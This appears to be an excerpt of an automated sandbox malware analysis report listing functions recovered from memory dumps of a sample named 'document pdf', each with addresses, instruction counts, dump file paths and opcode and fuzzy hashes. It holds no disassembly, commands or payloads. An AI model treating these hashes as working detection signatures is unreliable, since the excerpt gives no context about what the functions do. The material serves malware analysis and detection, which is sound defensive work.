                                                                                                                        Function 00F1F71F Relevance: .2, Instructions: 155COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c963d0f602cb6e8faf261cec3bc0aace6bc684c05c8571ac82cd0736932bcbff
                                                                                                                        • Instruction ID: ea58ac4c82ad7b701ed3800d4b0a63067d2af3c36d34cc0c36ac6bd8196c5db5
                                                                                                                        • Opcode Fuzzy Hash: c963d0f602cb6e8faf261cec3bc0aace6bc684c05c8571ac82cd0736932bcbff
                                                                                                                        • Instruction Fuzzy Hash: CA610374D01219CFDB15DFA5D898BEEBBB2FF88300F608129D806AB296DB755946CF40
                                                                                                                        Function 00F19C30 Relevance: .2, Instructions: 151COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8157d5c2a7ba4caceba1dfe7310d25d768421777698107ad30855c064f42c9e2
                                                                                                                        • Instruction ID: 7fa0b86b95dbe56ca0f57e57eb0de52b57ccc8e2d9a7fbe97c0b73167a16d402
                                                                                                                        • Opcode Fuzzy Hash: 8157d5c2a7ba4caceba1dfe7310d25d768421777698107ad30855c064f42c9e2
                                                                                                                        • Instruction Fuzzy Hash: 6B51E3707042059FDB11DF68D890BAEBBE6EF88310F14846AE988CB355DBB1CC41DBA1
                                                                                                                        Function 00F1AEF0 Relevance: .2, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3768b46feff04989cb8a793404fe394d28ad7c6dff072f0e17cc2e80fff70f85
                                                                                                                        • Instruction ID: 730e4bef1b6f1ded9ed7ab123e90bba132fa0cbcce15bb8888d55d8207c64a81
                                                                                                                        • Opcode Fuzzy Hash: 3768b46feff04989cb8a793404fe394d28ad7c6dff072f0e17cc2e80fff70f85
                                                                                                                        • Instruction Fuzzy Hash: 43412476B042049FCB15AB65D894AEE7BF6EFC8310F14406AE506D7385DE329C42DBA1
                                                                                                                        Function 00F1D548 Relevance: .1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e873e877f1eb611640134cc37ed0fdf2f791f04436498e498a1d25d60142305d
                                                                                                                        • Instruction ID: a28fd0eb3d52820ad3a91f75d73ac6e41d794f5616396197a6217416b3a5c21c
                                                                                                                        • Opcode Fuzzy Hash: e873e877f1eb611640134cc37ed0fdf2f791f04436498e498a1d25d60142305d
                                                                                                                        • Instruction Fuzzy Hash: AC51A474E01208DFDB54DFAAD9849DDBBF2BF89300F249169E809AB365DB30A901CF00
                                                                                                                        Function 00F141A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ef2143d9a0e93c82b8d82aa55f2c07501aee731671c3f0b33e10e0f0cab8e3c7
                                                                                                                        • Instruction ID: f16dcbd1c07fc32463169d33e725f8882a47f723f61b6e1bf2126de236a429fc
                                                                                                                        • Opcode Fuzzy Hash: ef2143d9a0e93c82b8d82aa55f2c07501aee731671c3f0b33e10e0f0cab8e3c7
                                                                                                                        • Instruction Fuzzy Hash: D9519474E01248CFCB48DFA9D98499DBBF2FF89300F209569E815AB364DB35A942CF50
                                                                                                                        Function 00F1A303 Relevance: .1, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4bff491599822270d892a3a817d466a1328ecda3e9885b4e684847394b0442d
                                                                                                                        • Instruction ID: da0c89c20f7ea6298a775632aef10156ba219866919e54dcaee294f04a2bcf89
                                                                                                                        • Opcode Fuzzy Hash: a4bff491599822270d892a3a817d466a1328ecda3e9885b4e684847394b0442d
                                                                                                                        • Instruction Fuzzy Hash: 0A41D331A01249DFCF11CFA4C844BDDBFB1AF45310F048056E8559B265D375E995DB52
                                                                                                                        Function 00F13CC0 Relevance: .1, Instructions: 112COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 485da509bc3d304d706452e01bb6ed56c590f604587500cbc0efdecf6944d03f
                                                                                                                        • Instruction ID: 1759f3f2b3f9b6b179abc759541943b73fc053816b0a533860325685b2755d67
                                                                                                                        • Opcode Fuzzy Hash: 485da509bc3d304d706452e01bb6ed56c590f604587500cbc0efdecf6944d03f
                                                                                                                        • Instruction Fuzzy Hash: 3F31D936B0422987DF185679A8943FEB9EAEBC4320F14403DD806D3384DFB5CE856791
                                                                                                                        Function 00F18EF8 Relevance: .1, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9976a157f46a1586574342f92c4279969b96c73b4b581830e99e718d9bdc2d28
                                                                                                                        • Instruction ID: ca691c602f5939f86a9c620edc02c8de0a8f1d4844dbef23bee0468fa9d10c75
                                                                                                                        • Opcode Fuzzy Hash: 9976a157f46a1586574342f92c4279969b96c73b4b581830e99e718d9bdc2d28
                                                                                                                        • Instruction Fuzzy Hash: EA3126317041518FCB398B39DA946BE7B67BB843A0B24046AF052CB292DF69CCC3A755
                                                                                                                        Function 00F15658 Relevance: .1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c2d5ac9b6d416ba66de5bc8aef121c8d11cdccd76bcb6fe0b051588fb7e0e8f9
                                                                                                                        • Instruction ID: 979387091f02eb9e89ebdf7be5a74119ae603d48490430fcdea623808b5af0e5
                                                                                                                        • Opcode Fuzzy Hash: c2d5ac9b6d416ba66de5bc8aef121c8d11cdccd76bcb6fe0b051588fb7e0e8f9
                                                                                                                        • Instruction Fuzzy Hash: 9531A071600509EFCF159FA4D885AAF3BA2FB88710F108425F95697294CB35DD61EB90
                                                                                                                        Function 00F18380 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6e866222e73f78e058fa0beb0f7f796fda91c57301866e1672eeb4fd960aab4c
                                                                                                                        • Instruction ID: 6e6b641d5ba824c812bccf3c0af85ea57b08936b7f167e15e718086be83bc58d
                                                                                                                        • Opcode Fuzzy Hash: 6e866222e73f78e058fa0beb0f7f796fda91c57301866e1672eeb4fd960aab4c
                                                                                                                        • Instruction Fuzzy Hash: 0F2183717002128BDB24DA6586947BE3696AFD87A8F248039D506CB79CDE76CC83F381
                                                                                                                        Function 00F162F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e2603f80c9ee3dd6c5373a179406fa96d9132a256dfaa5f524c86d2402b50fbc
                                                                                                                        • Instruction ID: 2177df99dcf9f0a4c1602b10138950d4a64a1eca12917a2b5c2903e03a656aba
                                                                                                                        • Opcode Fuzzy Hash: e2603f80c9ee3dd6c5373a179406fa96d9132a256dfaa5f524c86d2402b50fbc
                                                                                                                        • Instruction Fuzzy Hash: 272146357015218FC7259B39C49462EB3A2FFC93A1B18847AE856CB398CF31DC02DB80
                                                                                                                        Function 00F128F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3e3aa203ebf089d9b137de86d9082237e537d93c627fcc4b934dac99b1ef4a66
                                                                                                                        • Instruction ID: 5796272425a8caf3974c0d587f15bc7e925d0b33a55fe8ad6e0bc443c4fc82be
                                                                                                                        • Opcode Fuzzy Hash: 3e3aa203ebf089d9b137de86d9082237e537d93c627fcc4b934dac99b1ef4a66
                                                                                                                        • Instruction Fuzzy Hash: F021A435E001559FCB54DB68D840AEE77B5EB9D360F90C459E8099B340DB31EE82DBD0
                                                                                                                        Function 00ECD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664223884.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_ecd000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f95a4b4873508df101ccfe173bef6b3235de3640201c12fe4c9f47148a756d7c
                                                                                                                        • Instruction ID: 20a772eacc38a54dba18ba79427fa97a83328c3e27a379300d0b0137a688e9c9
                                                                                                                        • Opcode Fuzzy Hash: f95a4b4873508df101ccfe173bef6b3235de3640201c12fe4c9f47148a756d7c
                                                                                                                        • Instruction Fuzzy Hash: 8421FF71508204AFCB14DF28CA81F26BB66EB84318F24C56DE9491B252C77BD847CA62
                                                                                                                        Function 00F14285 Relevance: .1, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4c2a7313f35ee00469ea921efeadab96b172c6f13cf1a946942641dacab91d13
                                                                                                                        • Instruction ID: 28fbd8436ab5e9059e7e06b00960de02238dcbaa4117f97a8bef0d695157ba92
                                                                                                                        • Opcode Fuzzy Hash: 4c2a7313f35ee00469ea921efeadab96b172c6f13cf1a946942641dacab91d13
                                                                                                                        • Instruction Fuzzy Hash: E531A778E11248CFCB44DFA8E58499DBBF2FF49301B205469E819AB325D735AD42CF40
                                                                                                                        Function 00F15649 Relevance: .1, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a599291265837bf3bc3dfb29700ecb30561a72295f6895e58c04b2f96bdc768
                                                                                                                        • Instruction ID: 937766058da18401b8f34ab722b019e29eedb370d1991cb7dfe2f5186a8c9b69
                                                                                                                        • Opcode Fuzzy Hash: 4a599291265837bf3bc3dfb29700ecb30561a72295f6895e58c04b2f96bdc768
                                                                                                                        • Instruction Fuzzy Hash: B321A171A01518DFCB149F68D485BAF3BA1FB84710F108469F8469B358CB35DE91EBD0
                                                                                                                        Function 00F19761 Relevance: .1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 176b0ddb3bf8351e549a316f4805473764c411040d0c1941905ce590ee1a8385
                                                                                                                        • Instruction ID: 2f32ac83c0d186732c779a3e137e09482bb427354d687a2665314cc286918a3d
                                                                                                                        • Opcode Fuzzy Hash: 176b0ddb3bf8351e549a316f4805473764c411040d0c1941905ce590ee1a8385
                                                                                                                        • Instruction Fuzzy Hash: 7221BF70E04248DFCB05CFA1D6A0AEEBFB6EF49310F248069E410E6294CB30DD81EB60
                                                                                                                        Function 00F1F640 Relevance: .1, Instructions: 60COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 337fdebc608df5b8bcf00c3563df40ee3365f6cadd7edc69d8323ea292a52029
                                                                                                                        • Instruction ID: 87c173c95ae5eb3d396d584ecaaee1f4660a5c4e3491d80ff980947abdbe70ac
                                                                                                                        • Opcode Fuzzy Hash: 337fdebc608df5b8bcf00c3563df40ee3365f6cadd7edc69d8323ea292a52029
                                                                                                                        • Instruction Fuzzy Hash: 342166B0D0020ADFDB05EFA9D89079EBFF2FB81300F009569C154AB265EB745A469F81
                                                                                                                        Function 00F16300 Relevance: .1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8b32bfb25053158c48d20c744df17106341aafe3f55c8472c7ec55accff84f31
                                                                                                                        • Instruction ID: 90bf262e925b6fe06e6160fdc7ebd92a23af969e82ecf0f07d4c01a7ee6b4ace
                                                                                                                        • Opcode Fuzzy Hash: 8b32bfb25053158c48d20c744df17106341aafe3f55c8472c7ec55accff84f31
                                                                                                                        • Instruction Fuzzy Hash: DF1166367006118FC7299B2AC49493EB3A2FFC97A27180078E816CB364CF31DC02D780
                                                                                                                        Function 00F127F0 Relevance: .1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2efb4cd8ba8da926f70881ba7c9058e893f90c2229d138e4e7efb1836a4ed4c0
                                                                                                                        • Instruction ID: 712b2d89d9dc73dff2933023cb59c5f5f166099d0042d7975407f2c2f8f227fc
                                                                                                                        • Opcode Fuzzy Hash: 2efb4cd8ba8da926f70881ba7c9058e893f90c2229d138e4e7efb1836a4ed4c0
                                                                                                                        • Instruction Fuzzy Hash: FE21B2B4C0524A8FCF00DFA9D9845EEBFF0FF0A314F10466AD845B6224EB355A95CB91
                                                                                                                        Function 00F1F650 Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 62be846d1ecda3258bccba6d4af38715593f66aa5edbf97b06f095d5db3541bb
                                                                                                                        • Instruction ID: 5788dfe0827ae91550c4d93215ac46966c993063ab6357fcb75be790817a29aa
                                                                                                                        • Opcode Fuzzy Hash: 62be846d1ecda3258bccba6d4af38715593f66aa5edbf97b06f095d5db3541bb
                                                                                                                        • Instruction Fuzzy Hash: A71181B0D0020ACFDB04EFA9D89079EBFF1FB80300F009569C104AB265EB705A469F80
                                                                                                                        Function 00F1EB65 Relevance: .1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 751f9738542a27d51a9fe8682689863adb7c6182ed745f3cc4e6518dcecf8b5d
                                                                                                                        • Instruction ID: bd092c41bff4e5ae2cf70e328445f05f220c3c83c4623d777c35de51bfe0cc35
                                                                                                                        • Opcode Fuzzy Hash: 751f9738542a27d51a9fe8682689863adb7c6182ed745f3cc4e6518dcecf8b5d
                                                                                                                        • Instruction Fuzzy Hash: 5D217E78D01229CFCB64DF68D984B9DBBB1BF49314F1090A9D809A7351DB30AD86DF40
                                                                                                                        Function 00ECD03F Relevance: .1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664223884.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_ecd000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction ID: 260ac6a1064b2c0693445bfa00cf98c68f4b02ea97a6cc2861a2a7cf70f67d10
                                                                                                                        • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                                        • Instruction Fuzzy Hash: 74117C755082849FCB15CF14DAC4B16BB62FB44318F28C6ADE8494B656C33BD84ACB51
                                                                                                                        Function 00F15E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c477c9943babaff852786b95389005a93979ba5c15b529f96ac17a460a70b8b
                                                                                                                        • Instruction ID: c659aa8bba8ecae43f457c89e3e169e0c2f15ad6ee927d4044fa3a5c25d48790
                                                                                                                        • Opcode Fuzzy Hash: 7c477c9943babaff852786b95389005a93979ba5c15b529f96ac17a460a70b8b
                                                                                                                        • Instruction Fuzzy Hash: 65012D32B04165BFCB269E689C506EF3FE6DFC9750B184026F445D7285CA75CD2297D0
                                                                                                                        Function 00F1E8E8 Relevance: .0, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 618cc2621dcca68b6063a810b1465a5944fa6c410e55d07c759990c521b5f831
                                                                                                                        • Instruction ID: e2a0cb29ffcbcba1e9594253f0697c2187588b7f826f12e8286335920ae3b0ae
                                                                                                                        • Opcode Fuzzy Hash: 618cc2621dcca68b6063a810b1465a5944fa6c410e55d07c759990c521b5f831
                                                                                                                        • Instruction Fuzzy Hash: 3A116D74E0124A9FCF41DFA8D8849EEBBB1EB89300F11416AD811A33A4D3399A57DF81
                                                                                                                        Function 00F1ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 28487d0657267c65ba647c537489d82fd8d825154293cec53786eeb6bdc6c4d2
                                                                                                                        • Instruction ID: 38edd70541602ab63c2336481fc68f4125b983ded3aeee0d8ebdab77a8664d45
                                                                                                                        • Opcode Fuzzy Hash: 28487d0657267c65ba647c537489d82fd8d825154293cec53786eeb6bdc6c4d2
                                                                                                                        • Instruction Fuzzy Hash: E3F0F671B016104BC725AA3E9454A6AB6DEEFC8B65715407AE805C7365EE21CC8293C1
                                                                                                                        Function 00F19C2C Relevance: .0, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 363ee00ed02801051eb90090e2e875302a2c8deb38352d886359e239c216d4d8
                                                                                                                        • Instruction ID: 20cf8fed09f0bc7813b492a6dcd7a955529e5ae6206bc08f5a985fa95eae116a
                                                                                                                        • Opcode Fuzzy Hash: 363ee00ed02801051eb90090e2e875302a2c8deb38352d886359e239c216d4d8
                                                                                                                        • Instruction Fuzzy Hash: 34F08272E00118AFDB14CF59D844BEEBBF5EBC8321F10C026EA18C3214D3714A159B90
                                                                                                                        Function 00F128A2 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2030b9c13e6509bbe5cc7ae6cafdc590f6113c8781184e5ca7f573d2a0562df8
                                                                                                                        • Instruction ID: f9977c109dfa830b33d1f6b084cf795f85206780aa936d15f6e1009ae893def2
                                                                                                                        • Opcode Fuzzy Hash: 2030b9c13e6509bbe5cc7ae6cafdc590f6113c8781184e5ca7f573d2a0562df8
                                                                                                                        • Instruction Fuzzy Hash: 6DE0D831C213A64BC7129B64E8004EEFB34EF8725074446A7D85077041EB301968C7B0
                                                                                                                        Function 00F16739 Relevance: .0, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93f342e33d34131b4e3cdc07f402c812fff6cfd70e67f085752ac3a317b58bbd
                                                                                                                        • Instruction ID: 7a17eaf4cbad04492b38fd4509c0b0306c5b56992c5efc656c8e214ad77cb9aa
                                                                                                                        • Opcode Fuzzy Hash: 93f342e33d34131b4e3cdc07f402c812fff6cfd70e67f085752ac3a317b58bbd
                                                                                                                        • Instruction Fuzzy Hash: ECE0C23000C3D64FC607A338ACD628A3FBADE82200B0455D4D1404F1EBEFB8981B97D1
                                                                                                                        Function 00F128B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 037c56d3517c284f5267f6b2a5ee69c1c01939b3d3ae1aacc9ae7932f96072f4
                                                                                                                        • Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
                                                                                                                        • Opcode Fuzzy Hash: 037c56d3517c284f5267f6b2a5ee69c1c01939b3d3ae1aacc9ae7932f96072f4
